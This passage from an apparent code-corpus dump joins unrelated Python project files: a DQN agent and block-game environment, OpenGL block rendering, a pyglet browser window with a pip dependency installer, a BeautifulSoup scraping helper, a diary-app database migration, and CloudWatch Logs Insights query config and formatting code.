if len(self.replay_memory) < MIN_REPLAY_MEMORY_SIZE:
return
# Get a minibatch of random samples from memory replay table
minibatch = random.sample(self.replay_memory, MINIBATCH_SIZE)
# Get current states from minibatch, then query NN model for Q values
current_states = np.array([transition[0] for transition in minibatch])/255
current_qs_list = self.model.predict(current_states)
# Get future states from minibatch, then query NN model for Q values
# When using target network, query it, otherwise main network should be queried
new_current_states = np.array([transition[3] for transition in minibatch])/255
future_qs_list = self.target_model.predict(new_current_states)
X = []
y = []
# Now we need to enumerate our batches
for index, (current_state, action, reward, new_current_state, done) in enumerate(minibatch):
# If not a terminal state, get new q from future states, otherwise set it to 0
# almost like with Q Learning, but we use just part of equation here
if not done:
max_future_q = np.max(future_qs_list[index])
new_q = reward + DISCOUNT * max_future_q
else:
new_q = reward
# Update Q value for given state
current_qs = current_qs_list[index]
current_qs[action] = new_q
# And append to our training data
X.append(current_state)
y.append(current_qs)
# Fit on all samples as one batch, log only on terminal state
self.model.fit(np.array(X)/255, np.array(y), batch_size=MINIBATCH_SIZE, verbose=0, shuffle=False, callbacks=[self.tensorboard] if terminal_state else None)
# Update target network counter every episode
if terminal_state:
self.target_update_counter += 1
# If counter reaches set value, update target network with weights of main network
if self.target_update_counter > UPDATE_TARGET_EVERY:
self.target_model.set_weights(self.model.get_weights())
self.target_update_counter = 0
# Queries main network for Q values given current observation space (environment state)
def get_qs(self, state):
return self.model.predict(np.array(state).reshape(-1, *state.shape)/255)[0]
class WorldEnvironment(gym.Env):
def __init__(self, terrain_world, parent):
self.action_space = gym.spaces.Discrete(15)
self.observation_space = gym.spaces.Box(low=0, high=255, shape=(84, 84, 1), dtype=np.uint8)
self.velocity = (0, 0)
self.position = (0, 0)
self.terrain_world = terrain_world
self.parent = parent
self.inventory = []
self.scheduled_rewards = []
self.time_lapsed = 0
self.health = 100
self.observation = self.get_observation()
self.last_state = self.observation
self.agent = DQNAgent(self)
def play_sound(self):
# play self.parent.parent.parent.assets.get("coin.wav")
sound = self.parent.parent.parent.textures.get("coin.wav")
pygame.mixer.Sound.play(sound)
def get_observation(self):
_ = int(self.position[0] / 32), int(self.position[1] / 32)
observation = self.parent.parent.get_terrain_matrix(_, fov=25)
return observation
def step(self, action):
self.position = self.parent.body.position
self.time_lapsed += 1
reward = 0
# generate action id from tensor
if not isinstance(action, int):
action = action.argmax()
if action > 8 and action < 13 and random.randint(0, 3) == 0:
self.play_sound()
if action == 0:
self.velocity = (self.velocity[0] + 40, self.velocity[1])
elif action == 1:
self.velocity = (self.velocity[0] - 40, self.velocity[1])
elif action == 2:
self.velocity = (self.velocity[0], self.velocity[1] - 400)
elif action == 3:
self.velocity = (self.velocity[0] + 40, self.velocity[1] - 400)
elif action == 4:
self.velocity = (self.velocity[0] - 40, self.velocity[1] - 400)
elif action == 5:
# break block above
pos = int(self.position[0] / 32), int(self.position[1] / 32)
block = self.parent.parent.remove_block(pos)
if block is not None:
self.inventory.append(block)
elif action == 6:
# break block below
pos = int(self.position[0] / 32), int(self.position[1] / 32)
block = self.parent.parent.remove_block((pos[0], pos[1] + 1))
if block is not None:
self.inventory.append(block)
elif action == 7:
# break block left
pos = int(self.position[0] / 32), int(self.position[1] / 32)
block = self.parent.parent.remove_block((pos[0]-1, pos[1]))
if block is not None:
self.inventory.append(block)
elif action == 8:
# break block right
pos = int(self.position[0] / 32), int(self.position[1] / 32)
block = self.parent.parent.remove_block((pos[0]+1, pos[1]))
if block is not None:
self.inventory.append(block)
elif action == 9:
# place block above
try:
pos = int(self.position[0] / 32), int(self.position[1] / 32)
if len(self.inventory) > 0:
block = self.inventory.pop()
self.parent.parent.place_block(pos, block)
except Exception as e:
pass
elif action == 10:
# place block below
try:
pos = int(self.position[0] / 32), int(self.position[1] / 32)
if len(self.inventory) > 0:
block = self.inventory.pop()
self.parent.parent.place_block((pos[0], pos[1] + 1), block)
except Exception as e:
pass
elif action == 11:
# place block left
try:
pos = int(self.position[0] / 32), int(self.position[1] / 32)
if len(self.inventory) > 0:
block = self.inventory.pop()
self.parent.parent.place_block((pos[0]-1, pos[1]), block)
except Exception as e:
pass
elif action == 12:
# place block right
try:
pos = int(self.position[0] / 32), int(self.position[1] / 32)
if len(self.inventory) > 0:
block = self.inventory.pop()
self.parent.parent.place_block((pos[0]+1, pos[1]), block)
except Exception as e:
pass
# 13, 14: attack left, right
elif action == 13:
pos = int(self.position[0] / 32), int(self.position[1] / 32)
_ = self.parent.parent.attack((pos[0]-1, pos[1]))
if _ == None:
reward -= 10
else:
print(f'{_} was attacked by {self.parent.name}')
elif action == 14:
pos = int(self.position[0] / 32), int(self.position[1] / 32)
_ = self.parent.parent.attack((pos[0]+1, pos[1]))
if _ == None:
reward -= 10
else:
print(f'{_} was attacked by {self.parent.name}')
if self.position[1] > 10000:
reward += -100
self.reset()
print(f"[{self.parent.name}] fell off the world")
# reward on inventory size
reward += len(self.inventory) / 10
if len(self.scheduled_rewards) > 0:
reward += self.scheduled_rewards.pop(0)
reward += 100 * 1 / self.time_lapsed
# get distance to (0, 0)
distance = math.dist((0, 0), self.position)
if distance > 1000:
reward += 1 * distance / 1000
else:
reward += -1 * distance / 1000
# If a block exists at the player's position, the player is suffocated
_ = (self.position[0] / 32, self.position[1] / 32)
if self.parent.parent.get_terrain_at(_) != 0:
reward += -100
self.health -= 1
# sort the inventory
self.inventory = sorted(self.inventory, key=lambda x: x)
observation = self.get_observation()
# Health is 0 if the player is dead
if self.health <= 0:
reward += -100
self.reset()
print(f"[{self.parent.name}] died")
# give reward for maintaining health
reward += (self.health - 50) * 0.1
# train DQNAgent
self.agent.update_replay_memory((self.last_state, action, reward, observation, True))
self.last_state = observation
return observation, reward, False, {}
def reset(self):
self.parent.reset()
class Boxlander:
def __init__(self, name, parent):
self.parent = parent
self.name = name
self.FOV = 10
self.env = WorldEnvironment(self.parent, self)
self.frame = 0
self.body = pymunk.Body(1, 1)
self.body.position = (0, 0)
self.body.velocity = (0, 0)
self.body.angle = 0
self.shape = pymunk.Circle(self.body, 10)
self.shape.collision_type = 1
self.shape.color = (255, 255, 255)
self.shape.elasticity = 0.95
self.previous_velocity = (0, 0)
self.parent.space.add(self.body, self.shape)
self.epsilon = 0.1
def reset(self):
self.body.position = (0, 0)
self.body.velocity = (0, 0)
self.body.angle = 0
self.frame = 0
self.env.health = 100
def render(self, window):
for i in range(len(self.parent.collisions)-1):
try:
if self.shape in self.parent.collisions[i].shapes:
_ = self.previous_velocity[1] / 5000 * 3
if _ > 0.01:
self.env.health -= _
self.env.scheduled_rewards.append(-_)
self.parent.collisions.remove(self.parent.collisions[i])
except Exception as e:
pass
if self.frame % 20 == 0:
if random.randint(0, 100) < self.epsilon * 100 and self.epsilon > MIN_EPSILON:
self.env.step(self.env.action_space.sample())
self.epsilon *= ELIPSON_DECAY
else:
_ = self.env.agent.get_qs(self.env.get_observation())
self.env.step(_)
# apply force
# clamp velocity
self.body.velocity = self.body.velocity[0] + self.env.velocity[0], self.body.velocity[1] + self.env.velocity[1]
self.env.velocity = (0, 0)
self.env.position = self.body.position
self.frame += 1
# if the current body velocity is not 0, set the previous velocity to the current body velocity
if self.body.velocity[0] != 0 and self.body.velocity[1] != 0:
self.previous_velocity = self.body.velocity
# player color based on health
if self.env.health > 50:
c = (255, 255, 255)
elif self.env.health > 25:
c = (255, 255, 0)
else:
c = (255, abs(int(math.sin(self.frame / 10) * 255)), abs(int(math.sin(self.frame / 10) * 255)))
pygame.draw.circle(window, c, (int(self.body.position[0] - self.parent.parent.x), int(self.body.position[1]) - self.parent.parent.y), 10)
# nametag
font = pygame.font.SysFont("comicsansms", 20)
text = font.render(self.name, True, (255, 255, 255))
window.blit(text, (int(self.body.position[0] - self.parent.parent.x) - text.get_width() // 2, int(self.body.position[1]) - self.parent.parent.y + 32 - text.get_height() // 2))
# draw health bar
pygame.draw.rect(window, (255, 255, 255), (int(self.body.position[0] - self.parent.parent.x) - 10, int(self.body.position[1]) - self.parent.parent.y - 32, 20, 10))
color = (0, 255, 0) if self.env.health > 75 else (255, 255, 0) if self.env.health > 50 else (255, 0, 0)
pygame.draw.rect(window, color, (int(self.body.position[0] - self.parent.parent.x) - 10, int(self.body.position[1]) - self.parent.parent.y - 32, 20 * self.env.health / 100, 10))
``` |
{
"source": "1upCommunity/PyCraft",
"score": 3
} |
#### File: PyCraft/terrain/block.py
```python
from OpenGL.GL import *
import threading
import random
import time
class Block:
"""
Block
* Base block class
"""
def __init__(self, name, renderer):
"""
Block.__init__
:name: name of the block
:texture: texture of the block
:parent: the parent window
"""
self.name = name
self.renderer = renderer
self.tex_coords = {}
self.preloads = []
self.preloads_per_frame = 1
self.preloaded = 0
self.added_data = []
def preload(self, position, chunk, storage):
"""
preload
* Preloads the textures of the block
"""
self.add(position, chunk, storage)
def add(self, position, chunk, storage):
"""
add
* Adds a block to the world
:position: the position of the block
"""
x, y, z = position
X, Y, Z = (x + 1, y + 1, z + 1)
if not chunk.world.block_exists((x, Y, z)):
storage.add((x, Y, Z, X, Y, Z, X, Y, z, x, Y, z), self.tex_coords["top"])
if not chunk.world.block_exists((x, y - 1, z)):
storage.add((x, y, z, X, y, z, X, y, Z, x, y, Z), self.tex_coords["bottom"])
if not chunk.world.block_exists((x - 1, y, z)):
storage.add((x, y, z, x, y, Z, x, Y, Z, x, Y, z), self.tex_coords["left"])
if not chunk.world.block_exists((X, y, z)):
storage.add((X, y, Z, X, y, z, X, Y, z, X, Y, Z), self.tex_coords["right"])
if not chunk.world.block_exists((x, y, Z)):
storage.add((x, y, Z, X, y, Z, X, Y, Z, x, Y, Z), self.tex_coords["front"])
if not chunk.world.block_exists((x, y, z - 1)):
storage.add((X, y, z, x, y, z, x, Y, z, X, Y, z), self.tex_coords["back"])
def all_blocks(renderer):
"""
all_blocks
* Returns a list of all blocks
"""
# List all files in the blocks folder
# Then import each file as a module
# Then get the block class from the module
# Then add the block class to the dictionary
import os
import sys
import importlib
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
blocks = {}
for file in os.listdir("./terrain/blocks"):
if file.endswith(".py") and file != "__init__.py":
module = importlib.import_module("blocks." + file[:-3])
_block = module.block(renderer)
blocks[_block.name] = _block
return blocks
``` |
{
"source": "1upCommunity/Vortex",
"score": 3
} |
#### File: Vortex/core/jsparse.py
```python
import pyjsparser
class VortexJSParser:
"""
VortexJSParser
A class to parse javascript code.
"""
def __init__(self):
"""
__init__
Initialize the parser.
return: self
"""
@staticmethod
def parse(js_code):
"""
parse
Parse the javascript code.
js_code: The javascript code.
return: dict
"""
return pyjsparser.parse(js_code) # parse the javascript code
```
#### File: Vortex/Vortex/dependency_installer.py
```python
import os
import tqdm
import sys
import importlib
deps = importlib.import_module("dependency_list").deps # get dependency list
path = sys.executable # get path to python
def install_deps():
"""
install_deps
Install all dependencies.
return: None
"""
for dep in tqdm.tqdm(deps): # loop through all dependencies
os.system(f"{path} -m pip install {dep}") # install the dependency
if __name__ == '__main__':
install_deps() # install dependencies
```
#### File: Vortex/rendering/renderer.py
```python
from rendering import VortexInfo
# external imports
import pyglet
from pyglet.window import Window
class VortexWindow(Window):
"""
VortexWindow
This class is the main window of the application.
"""
def __init__(self):
"""
__init__
initialize the window
return: self
"""
super().__init__(resizable=True) # initialize the base class
self.batch = pyglet.graphics.Batch() # create a batch
self.frame = 0 # frame counter
self.resizable = True # allow resizing
self.tab_bar_height = 20 # tab bar height
self.set_caption("Vortex") # set window title
self.set_icon(pyglet.image.load( # logo image
"assets/VortexLogoTransparent.png"))
self.info_label = VortexInfo(self) # create the info label
pyglet.clock.schedule_interval(self.on_update, 1/60) # schedule update
pyglet.clock.schedule_once(self.refresh_size, 0) # schedule draw
def refresh_size(self, *args):
"""
refresh_size
A solution to the wierd white line that appears
in the starting and goes away after the first resize.
*args: Receives the pyglet dt argument.
return: None
"""
self.set_size(self.width, self.height) # set the size of the window
def on_draw(self):
"""
on_draw
Draw the window.
return: None
"""
self.clear() # clear the window
self.batch.draw() # draw the batch
def on_update(self, dt):
"""
on_update
Update the window.
dt: The time since the last update.
return: None
"""
self.frame += 1 # increment the frame counter
self.info_label.update() # update the info label
``` |
{
"source": "1upkd/awesome_rasam",
"score": 3
} |
#### File: src/awesome_rasam/__init__.py
```python
__version__ = "0.0.6"
import time
import traceback
from bs4 import BeautifulSoup
from bs4.element import Tag
import requests
default_features = "html5lib"
class AwesomeRasam:
def __init__(self, initializer, *args, **kwargs):
if isinstance(initializer, str):
if (initializer.startswith("http://")
or initializer.startswith("https://")):
if 'delay' in kwargs:
if callable(kwargs['delay']):
time.sleep(kwargs['delay']())
else:
time.sleep(kwargs['delay'])
del kwargs['delay']
r = requests.get(initializer, **kwargs)
self._soup = BeautifulSoup(r.text, features=default_features)
else:
self._soup = BeautifulSoup(initializer, *args, **kwargs)
elif (isinstance(initializer, BeautifulSoup)
or isinstance(initializer, Tag)):
self._soup = initializer
else:
error_text = "Intializer must be url string, html/xml string, BeautifulSoup or bs4.Element.Tag, but got {} object"
error_text = error_text.format(type(initializer))
raise UnsupportedInitializer(error_text)
@staticmethod
def _get_attribute(el, selector, attribute, pipe=[], attribute_flag=True, fallback=None):
if attribute==">text":
extract = el.text
elif attribute==">inner_markup":
extract = el.decode_contents()
elif attribute==">outer_markup":
extract = str(el)
elif attribute==">rasam":
extract = AwesomeRasam(el)
else:
extract = el.get(attribute)
if extract is None:
if attribute_flag:
raise AttributeIsNone("selector={} & attribute={}".format(selector, attribute))
else:
return fallback
if callable(pipe):
pipe = [pipe]
for f in pipe:
extract = f(extract)
return extract
def get(self, selector, attribute, pipe=[], flag=True, fallback=None):
if selector==">self":
el = self._soup
else:
el = self._soup.select_one(selector)
if el:
pass
elif flag:
raise ElementNotFound(selector)
else:
return fallback
return AwesomeRasam._get_attribute(el, selector, attribute, pipe, flag, fallback)
def get_all(self, selector, attribute, pipe=[], flag=True, attribute_flag=True, fallback=None):
el_list = self._soup.select(selector)
if el_list:
pass
elif flag:
raise NoElementsFound(selector)
else:
return []
results = []
for el in el_list:
results.append(AwesomeRasam._get_attribute(el, selector, attribute, pipe, attribute_flag, fallback))
return results
class UnsupportedInitializer(Exception):
pass
class ElementNotFound(Exception):
pass
class NoElementsFound(Exception):
pass
class AttributeIsNone(Exception):
pass
if __name__=="__main__":
pass
'''url = "https://wios.xyz"
print(AwesomeRasam(url, headers={"User-Agent": "Bot"})._soup.title)
r = requests.get(url)
print(AwesomeRasam(r.text, features="html5lib")._soup.title)
print(AwesomeRasam(BeautifulSoup(r.text, features="html5lib"))._soup.title)
AwesomeRasam(6, headers={"User-Agent": "Bot"})
rasam = AwesomeRasam("https://wios.xyz", delay=1)
print(rasam.get("header",">text"))
print(rasam.get("header",">inner_markup"))
print(rasam.get("header",">outer_markup"))
print(rasam.get("header",">rasam").get("a",">rasam").get(">self",">outer_markup"))
print(rasam.get("a[href^='https://']","href",pipe = [
lambda x: x.split("https://")[1],
lambda x: "http://" + x
]))
rasam = AwesomeRasam("https://1upkd.com", delay=1)
print(rasam.get_all("a[href^='https://']","href",pipe=[
lambda x: AwesomeRasam(x, delay=1).get("title",">text",flag=False)
],attribute_flag=False, fallback="lol"))'''
``` |
{
"source": "1uvu/aae-hash",
"score": 2
} |
#### File: aae-hash/aae_hash/utils.py
```python
from torchvision.utils import make_grid
from PIL import Image
import torch
import shutil
import re
import cv2 as cv
import numpy as np
import os
from setting import INPUT_DIR, TRAIN_DIR
# 图像形态学的卷积核,可自定义或者使用api
kernel = cv.getStructuringElement(cv.MORPH_ELLIPSE, (25, 25))
dCount = 6 # 膨胀次数
eCount = 1 # 腐蚀次数
# 图像预处理需要的一些方法,函数中的control为使用函数里的那种方法
class imgTools():
def __init__(self):
pass
# 图像灰度化
def imgGray(self, img):
self.grayImg = cv.cvtColor(img, cv.COLOR_BGR2GRAY)
return self.grayImg
# 图像变换
def imgConver(self, grayImg):
fi = grayImg / 255
gamma = 2
self.newImg = np.power(fi, gamma)
self.newImg = np.uint8(np.clip((1.5 * grayImg + 15), 0, 255))
return self.newImg
# 图像增强
def imgEnhance(self, grayImg):
clahe = cv.createCLAHE(clipLimit=5.0, tileGridSize=(2, 2))
self.enhanceImg = clahe.apply(grayImg)
return self.enhanceImg
# 图像滤波
def imgBlur(self, img):
self.blurImg = cv.GaussianBlur(img, (11, 11), 0)
return self.blurImg
# 图像二值化
def imgBinary(self, grayImg):
(_, self.thresh) = cv.threshold(grayImg, 0, 255, cv.THRESH_OTSU)
return self.thresh
# 图像腐蚀膨胀
def imgMorp(self, control, thresh):
# 开运算
# kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (25, 25))
self.closed = cv.morphologyEx(thresh, cv.MORPH_CLOSE, kernel)
if control == 'open':
self.closed = cv.dilate(self.closed, None, iterations=dCount) # dCount膨胀次数
self.closed = cv.erode(self.closed, None, iterations=eCount) # eCount腐蚀次数
return self.closed
# 闭运算
elif control == 'close':
self.closed = cv.erode(self.closed, None, iterations=eCount) # 腐蚀
self.closed = cv.dilate(self.closed, None, iterations=dCount) # 膨胀
return self.closed
# 其他形态学操作
else:
pass
imgTools = imgTools()
# 图像分割算法需要改进
def img_cut(path):
# print(path)
img = cv.imread(path)
print(img.shape)
grayImg = imgTools.imgGray(img)
newImg = imgTools.imgConver(grayImg)
blurImg = imgTools.imgBlur(newImg)
enhanceImg = imgTools.imgEnhance(blurImg)
canny = cv.Canny(enhanceImg, 50, 50 * 3, apertureSize=3)
thresh = imgTools.imgBinary(canny)
closed = imgTools.imgMorp('open', thresh)
cnts, _ = cv.findContours(
closed.copy(),
cv.RETR_EXTERNAL,
cv.CHAIN_APPROX_SIMPLE
)
c = sorted(cnts, key=cv.contourArea, reverse=True)[0]
rect = cv.minAreaRect(c)
box = np.int0(cv.boxPoints(rect))
Xs = [i[0] for i in box]
Ys = [i[1] for i in box]
x1 = min(Xs)
x2 = max(Xs)
y1 = min(Ys)
y2 = max(Ys)
if x1 > 0 and y1 > 0:
pass
else:
x1 = 0
y1 = 0
hight = y2 - y1
width = x2 - x1
cutImg = img[y1:y1 + hight, x1:x1 + width]
cv.imwrite('./temp.jpg', cutImg)
cv.imshow('cut', cutImg)
cv.waitKey()
cv.destroyAllWindows()
return cutImg
def img_reshape(args):
os.makedirs(TRAIN_DIR + "imgs/", exist_ok=True)
img_list = os.listdir(INPUT_DIR)
count = 0
for im in img_list:
img_path = INPUT_DIR + im
try:
img = img_cut(img_path)
img = cv.resize(img, (args.img_size, args.img_size))
cv.imwrite(TRAIN_DIR + "imgs/" + im, img)
count += 1
except:
print(INPUT_DIR + im)
def parse_img(tensor, nrow=8, padding=2,
normalize=False, range=None, scale_each=False, pad_value=0):
grid = make_grid(tensor, nrow=nrow, padding=padding, pad_value=pad_value,
normalize=normalize, range=range, scale_each=scale_each)
# Add 0.5 after unnormalizing to [0, 255] to round to nearest integer
ndarr = grid.mul_(255).add_(0.5).clamp_(0, 255).permute(1, 2, 0).to('cpu', torch.uint8).numpy()
im = Image.fromarray(ndarr)
return im
def img_migrate(ori_p, img_list=[]):
os.makedirs(INPUT_DIR, exist_ok=True)
dir_list = os.listdir(ori_p)
if len(dir_list) > 0:
for name in dir_list:
path = ori_p + name
if os.path.isdir(path):
path+="/"
print("dir: ", path)
img_list = img_migrate(path, img_list)
else:
name = name.lower()
t = re.split(r"\.", name)
img = ""
for i in range(len(t)-1):
img+=re.sub("\W", "", t[i])
img = img + "." + t[-1]
print("img: ", img)
img_list.append(img)
shutil.copyfile(path, INPUT_DIR+img)
# os.remove(path)
return img_list
if __name__ == '__main__':
print("不支持直接运行!!!")
``` |
{
"source": "1uvu/english-reading",
"score": 3
} |
#### File: scripts/src/analysis.py
```python
import json
def word_handle(data):
word_dict = {}
y = 2010
for d in data:
print(d)
text = d["text"]
word_list = []
for t in text:
words = t["words"]
word_list.append(words)
word_dict[str(y)] = word_list
y += 1
return word_dict
if __name__ == "__main__":
js = open("../../output/word.json", "r").read()
data = json.loads(js)["data"]
word_dict = word_handle(data)
``` |
{
"source": "1uvu/webchat",
"score": 2
} |
#### File: webchat/chat/models.py
```python
from django.contrib.auth.models import User
from django.db import models
class ChatMessage ( models.Model ):
"""
Model to represent user submitted changed to a resource guide
"""
user = models.ForeignKey ( User, on_delete = models.CASCADE )
group_name = models.TextField ()
message = models.TextField ()
created = models.DateTimeField ( auto_now_add = True )
def __str__ (self):
"""
String to represent the message
"""
return self.message
class Meta:
verbose_name = 'chat_message'
# -*- coding: utf-8 -*-
from django.db import models
from model_utils.models import TimeStampedModel, SoftDeletableModel
from django.conf import settings
from django.template.defaultfilters import date as dj_date
from django.utils.translation import ugettext as _
from django.utils.timezone import localtime
class Dialog(TimeStampedModel):
owner = models.ForeignKey(settings.AUTH_USER_MODEL, verbose_name=_("Dialog owner"), related_name="selfDialogs",
on_delete=models.CASCADE)
opponent = models.ForeignKey(settings.AUTH_USER_MODEL, verbose_name=_("Dialog opponent"), on_delete=models.CASCADE)
def __str__(self):
return _("Chat with ") + self.opponent.name
class Message(TimeStampedModel, SoftDeletableModel):
dialog = models.ForeignKey(Dialog, verbose_name=_("Dialog"), related_name="messages", on_delete=models.CASCADE)
sender = models.ForeignKey(settings.AUTH_USER_MODEL, verbose_name=_("Author"), related_name="messages",
on_delete=models.CASCADE)
text = models.TextField(verbose_name=_("Message text"))
read = models.BooleanField(verbose_name=_("Read"), default=False)
all_objects = models.Manager()
def get_formatted_create_datetime(self):
return dj_date(localtime(self.created), settings.DATETIME_FORMAT)
def __str__(self):
return self.sender.name + "(" + self.get_formatted_create_datetime() + ") - '" + self.text + "'"
``` |
{
"source": "1uy31/django-app-boilerplate",
"score": 2
} |
#### File: django-app-boilerplate/tests/test_dummy.py
```python
from django.conf import settings
def test_dummy():
assert settings.ALLOWED_HOSTS == ["*"]
``` |
{
"source": "1uy31/learning-diary",
"score": 3
} |
#### File: core/models/category.py
```python
from dataclasses import dataclass
from flask import current_app
from sqlalchemy import Column, String
from sqlalchemy.orm import relationship
from .base import ModelMixin, TimestampMixin
from .database import DatabaseConnector
with current_app.app_context():
# Need to use db.Model for migrations to be detected.
db = current_app.extensions["migrate"].db
class Category(ModelMixin, TimestampMixin, db.Model): # type: ignore
name = Column(String(256), nullable=False, unique=True)
diaries = relationship("Diary", back_populates="category")
def __str__(self):
return f"<Category: {self.name}>"
@dataclass
class CategoryConnector:
model = Category
database_helper = DatabaseConnector()
def delete_category_by_name(self, name: str):
"""
Delete matched Category object from database.
:param name:
:return:
:raise: Exception if fail
"""
category = db.session.query(self.model).filter(self.model.name == name).first()
if not category:
raise Exception(f"There is no Category with name {name}.")
db.session.delete(category)
db.session.commit()
```
#### File: migrations/versions/47454edab16c_.py
```python
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = "47454edab16c"
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table(
"category",
sa.Column("id", sa.Integer(), nullable=False),
sa.Column(
"created_at",
sa.DateTime(timezone=True),
server_default=sa.text("now()"),
nullable=True,
),
sa.Column("updated_at", sa.DateTime(timezone=True), nullable=True),
sa.Column("name", sa.String(length=256), nullable=False),
sa.PrimaryKeyConstraint("id"),
sa.UniqueConstraint("name"),
)
op.create_table(
"note",
sa.Column("id", sa.Integer(), nullable=False),
sa.Column(
"created_at",
sa.DateTime(timezone=True),
server_default=sa.text("now()"),
nullable=True,
),
sa.Column("updated_at", sa.DateTime(timezone=True), nullable=True),
sa.Column(
"position",
sa.SmallInteger(),
nullable=False,
comment="The position of each note in a diary.",
),
sa.Column("text", sa.Text(), nullable=True),
sa.Column("image_url", sa.String(length=256), nullable=True),
sa.Column("source_url", sa.String(length=256), nullable=True),
sa.PrimaryKeyConstraint("id"),
sa.UniqueConstraint("position"),
)
op.create_table(
"diary",
sa.Column("id", sa.Integer(), nullable=False),
sa.Column(
"created_at",
sa.DateTime(timezone=True),
server_default=sa.text("now()"),
nullable=True,
),
sa.Column("updated_at", sa.DateTime(timezone=True), nullable=True),
sa.Column("topic", sa.String(), nullable=False),
sa.Column("category", sa.Integer(), nullable=True),
sa.Column("note", sa.Integer(), nullable=True),
sa.Column("source_url", sa.String(length=256), nullable=True),
sa.Column("review_count", sa.SmallInteger(), nullable=True),
sa.Column("rate", sa.SmallInteger(), nullable=True),
sa.ForeignKeyConstraint(["category"], ["category.id"], ondelete="RESTRICT"),
sa.ForeignKeyConstraint(["note"], ["note.id"], ondelete="CASCADE"),
sa.PrimaryKeyConstraint("id"),
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table("diary")
op.drop_table("note")
op.drop_table("category")
# ### end Alembic commands ###
``` |
{
"source": "1v1a3x/pyinsights",
"score": 2
} |
#### File: pyinsights/pyinsights/config.py
```python
import json
from dataclasses import dataclass, asdict
from functools import cached_property
from pathlib import Path
from typing import Any, Dict, List, NamedTuple, Union
from jsonschema import Draft7Validator
from jsonschema.exceptions import ValidationError
from yaml import safe_load
from pyinsights.exceptions import (
ConfigInvalidSyntaxError,
ConfigNotFoundError,
ConfigVersionUnknownError,
InvalidVersionError
)
from pyinsights.helper import (
convert_to_epoch,
convert_string_duration_to_datetime,
DatetimeType
)
ConfigType = Dict[str, Any]
SchemaType = Dict[str, Any]
class ConfigFile(NamedTuple):
filename: str
content: ConfigType
@classmethod
def from_filename(cls, filename) -> 'ConfigFile':
return cls(filename, load_yaml(filename))
@property
def version(self) -> str:
try:
return self.content['version']
except KeyError:
raise ConfigVersionUnknownError(
'Please Specify configuration version'
)
def convert_duration(self) -> Dict[str, int]:
duration = self.content['duration']
if isinstance(duration, str):
duration = convert_string_duration_to_datetime(duration)
duration_epoch = {
key: convert_to_epoch(value)
for key, value in duration.items()
}
return duration_epoch
def get_query_params(self) -> ConfigType:
params = self.content.copy()
new_duration = self.convert_duration()
del params['version']
del params['duration']
params.update(new_duration)
return params
def load_config(filepath: str) -> ConfigType:
"""Load configuration
Arguments:
filepath {str}
Returns:
{ConfigType} -- query parameters
"""
config = ConfigFile.from_filename(filepath)
validate(config.content, config.version)
return config
def load_yaml(filepath: str) -> ConfigType:
"""Load YAML configuration file
Arguments:
filepath {str}
Raises:
ConfigNotFoundError
Returns:
config {ConfigType}
"""
try:
with open(filepath) as fd:
return safe_load(fd)
except FileNotFoundError:
raise ConfigNotFoundError('Could not find the configuration')
def load_schema(version: str) -> SchemaType:
"""Load the schema json file
Arguments:
version {str}
Raises:
InvalidVersionError
Returns:
schema {SchemaType}
"""
basepath = Path(__file__).parent.resolve()
filename = f'version_{version}.json'
schema_filpath = f'{basepath}/schema/{filename}'
try:
with open(schema_filpath) as fd:
return json.load(fd)
except FileNotFoundError:
raise InvalidVersionError(f'The version {repr(version)} is invalid')
def validate(config: ConfigType, version: str) -> bool:
"""Validate the configuration
Arguments:
config {ConfigType}
version {str}
Raises:
ConfigInvalidSyntaxError
Returns:
bool
"""
try:
schema = load_schema(version)
Draft7Validator(schema).validate(config)
except ValidationError as err:
raise ConfigInvalidSyntaxError(err)
except Exception as err:
raise err
else:
return True
```
#### File: pyinsights/pyinsights/formatter.py
```python
import json
import shutil
from typing import Dict, List, Type
QueryResult = Type[List[List[Dict[str, str]]]]
class Formatter:
def __init__(self, format_type: str = 'json') -> None:
"""
Keyword Arguments:
format_type {str} -- [description] (default: {'json'})
"""
self.format_type = format_type
def _to_pretty_dict(self, results: QueryResult) -> List[Dict[str, str]]:
"""Format results to python dict in list
Arguments:
results {QueryResult}
Returns:
List[Dict[str, str]]
"""
formatted_result = [
{
field['field']: field['value']
for field in result if field['field'] != '@ptr'
}
for result in results
]
return formatted_result
def to_json(self, results: QueryResult) -> str:
"""Format results to json
Arguments:
results {QueryResult}
Returns:
str
"""
if not results:
return ''
tmp_resuls = self._to_pretty_dict(results)
formatted_result = json.dumps(tmp_resuls, indent=2, ensure_ascii=False)
return formatted_result
def to_table(self, results: QueryResult) -> str:
"""Format results to string table
Arguments:
results {QueryResult}
Returns:
str
"""
if not results:
return ''
tmp_results = self._to_pretty_dict(results)
headers = list(tmp_results[0].keys())
width, _ = shutil.get_terminal_size()
length_per_column = width // len(headers)
table_header = ''
for header in headers:
table_header += header.ljust(length_per_column)
table_record = ''
for result in tmp_results:
for field in result.values():
table_record += \
field[:length_per_column - 2].ljust(length_per_column)
table_record += '\n'
formatted_result = f'{table_header}\n{table_record}'
return formatted_result
def format_result(
format_type: str,
results: QueryResult
) -> str:
"""Format the query result
Arguments:
format_type {str}: json or table
results {QueryResult}
Returns:
str
"""
formatter = Formatter(format_type)
func = getattr(formatter, f'to_{format_type}')
formatted_result = func(results)
return formatted_result
```
#### File: pyinsights/pyinsights/helper.py
```python
import sys
import random
from datetime import datetime, timedelta
from typing import Dict, Type, Union
from pyinsights.exceptions import InvalidDurationError
DatetimeType = Type[datetime]
def convert_to_epoch(duration: Union[str, DatetimeType]) -> int:
"""Convert datetime string to epoch (POSIX timestamp)
Arguments:
duration {Union[str, DatetimeType]}
-- string format must be `%Y-%m-%d %H:%M:%S`
if duration type is str
Raises:
InvalidDurationError
Returns:
epoch {int}
"""
if isinstance(duration, str):
time_format = '%Y-%m-%d %H:%M:%S'
try:
duration = datetime.strptime(duration, time_format)
except ValueError:
raise InvalidDurationError(
f'{duration=} is invalid datetime format as \
duration parameter'
)
if not isinstance(duration, datetime):
raise InvalidDurationError(
f'Cloud not convert {duration=} to POSIX timestamp'
)
epoch = int(duration.timestamp())
return epoch
TIME_UNITS = {
's': 'seconds',
'm': 'minutes',
'h': 'hours',
'd': 'days',
'w': 'weeks'
}
def convert_string_duration_to_datetime(
string_duration: str
) -> Dict[str, DatetimeType]:
"""Convert string duration to datetime
Arguments:
